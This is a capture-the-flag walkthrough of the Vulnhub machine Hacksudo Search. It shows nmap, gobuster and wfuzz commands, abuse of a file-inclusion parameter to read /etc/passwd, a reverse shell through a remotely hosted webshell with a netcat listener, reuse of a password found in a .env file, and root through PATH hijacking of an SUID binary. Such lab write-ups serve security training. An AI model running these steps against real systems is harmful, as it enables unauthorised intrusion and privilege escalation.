In this post, I am going to do the walkthrough of a machine from Vulnhub called Hacksudo Search. In this writeup, I will be explaining all the steps to get to the root user.
Link to the machine: https://www.vulnhub.com/entry/hacksudo-search,683/
All walkthroughs: https://nepcodex.com/tag/walkthrough/
Identify the target
First of all, I have to identify the IP address of the target. So, I can use a tool called netdiscover to do this.
sudo netdiscover -i eth0 -r 10.0.2.1/24
Next, I have to do scan the open ports.
Scan open ports
nmap -T4 -sC -sV -p- --min-rate=1000 10.0.2.21
Here, I found that ports 80 and 22 are open. Thus, I am going to see what the website offers. However, there is nothing important on the main screen as it has a search feature that would fire up Google search.
Now that, I have to do directory enumeration in the webserver.
Directory Enumeration
gobuster dir -u http://10.0.2.21 -x html,txt,php --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
Here, I found an interesting page that is similar to the main page. Hence, I looked around the webpage to see any vulnerabilities.
I found a must compelling evidence for Local File Inclusions (LFI) and Remote File Inclusions (RFI). However, I had no luck getting the exploit.
Fuzz
While doing fuzzing, I generally try different combinations with existing known parameters. So, I know that the parameter ‘me’ is vulnerable to LFI. However, for the purpose of the walkthrough, I am going to use wfuzz.
wfuzz -c -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.0.2.21/search1.php?FUZZ=contact.php --hl 137
The parameter “me” gave a different output. Eventually, we got the same result with our manual inspection. Subsequently, I opened the /etc/passwd file to view the users of the machine.
Now, I can try RFI vulnerability. For that, I copied a webshell to get the reverse shell and listened on the port.
nc -nlvp 4444 # Listen to the port 4444
# Copied webshell and change the ip and port to 10.0.2.15 and 4444 respectively
python3 -m http.server 9000
On the /var/www/html directory, I found a .env file which had a possible password of one of the users. Hence, I decided to switch to different users from the passwd file.
Finally, I got the user shell and I will login using SSH.
Privilege escalation to root
After I got the user’s shell, I had to do the privilege escalation.
find / -perm -4000 -exec ls -al {} \; 2>/dev/null
I found an SUID binary and its source that could get me root access.
As we can see above, the binary runs a binary “install” that is present in the PATH. Now, I can create my own binary that could give me a root shell.
cd /tmp
echo '/bin/bash -i' > install
chmod +x install
cd ~/search/tools/
export PATH=/tmp/:$PATH
./searchinstall -p
Finally, we got the root shell and the root flag as well.